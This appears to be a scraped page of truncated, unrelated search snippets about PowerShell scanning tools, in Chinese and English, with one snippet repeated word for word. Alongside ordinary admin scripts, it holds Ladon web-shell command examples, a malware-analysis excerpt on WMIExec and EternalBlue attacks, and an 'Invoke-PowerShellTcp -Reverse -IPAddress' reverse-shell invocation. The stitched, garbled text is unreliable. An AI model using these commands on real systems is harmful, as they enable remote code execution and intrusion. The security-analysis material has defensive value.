powershell-script scanner PowerShell_IPv4NetworkScanner是一个功能强大的异步IPv4网络扫描器,专为PowerShell编写。它提供了一种简单而高效的方式来扫描和探测IPv4网络上的设备和主机。 该扫描器使用异步技术,能够同时扫描多个IP地址,大大提高了扫描速度和效率。它可以通过指定起始和结束IP地址范围,或者通过输入一个...
The script checks the specified TCP ports on the domain controllers, and if any of the ports are unavailable, it highlights them in red (you canrun this PowerShell script as a Windows service). Simple TCP/IP Port Scanner in PowerShell You can use PowerShell to implement a simple IP scan...
PS > Get-PSAmsiScanResult -ScriptString 'test' False PS > \$Scanner = New-PSAmsiScanner PS > Get-PSAmsiScanResult -ScriptUri \$MaliciousUrl -PSAmsiScanner \$Scanner True PS > \$Scanner.AlertCount 1 这个PSAmsiScanner只是一个在PowerShell中进行AMSI扫描的方便机制,在PSAmsi之外可能有更多的防御...
Usage:Ladon WebShell ScriptType ShellType url pwd cmd Example: Ladon WebShell jsp ua Ladon whoami Example: Ladon WebShell aspx cd Ladon whoami Example: Ladon WebShell php ua Ladon whoami Example: Ladon WebShell...
通过枚举网段IP,进行攻击,由于给WMIExec 命令行参数传错,导致这个攻击彻底废了,那只好MS17010出马了,通过调用C#实现的[PingCastle.Scanners.ms17_010scanner]::SCAn接口,以及SMB_EtERNAlbLue函数进行攻击。 模块分析 继上文说到本样本使用了WMIExec和MS17010攻击包,那么这些东西是什么,又是怎么引入的?这也是本节要说...
PowerShell's flexibility through its scripting language is one of its strengths. It is much easier to modify a script than to wait for an update of an antivirus application or the release a new vulnerability definition. As a native tool, PowerShell can access the lowest layers of the...
name in the current PowerShell session. Therefore, make sure the function call is made in the script itself while using encodedcommand parameter from a non-PowerShell shell. For above example, add a function call (without quotes)"Invoke-PowerShellTcp -Reverse -IPAddress [IP] -Port [PortNo....
Powershell2.0版本下的脚本:<# Script Function: get size of folder Script Editor: Snail Yu #> $directories=Get-ChildItem c:\windows |where {$_.mod Powershell 文件夹大小 原创 StanlyCheng 2014-09-05 10:34:15 10000+阅读 powershell删除文件夹命令 ...
For example, this might be the case for your service account that runs the Azure Information Protection scanner.High-level steps:Create a PowerShell script on your local computer. Run Set-AIPAuthentication to get an access token and copy it to the clipboard. Modify the PowerShell...
通过枚举网段IP,进行攻击,由于给WMIExec 命令行参数传错,导致这个攻击彻底废了,那只好MS17010出马了,通过调用C#实现的[PingCastle.Scanners.ms17_010scanner]::SCAn接口,以及SMB_EtERNAlbLue函数进行攻击。 模块分析 继上文说到本样本使用了WMIExec和MS17010攻击包,那么这些东西是什么,又是怎么引入的?这也是本节要说...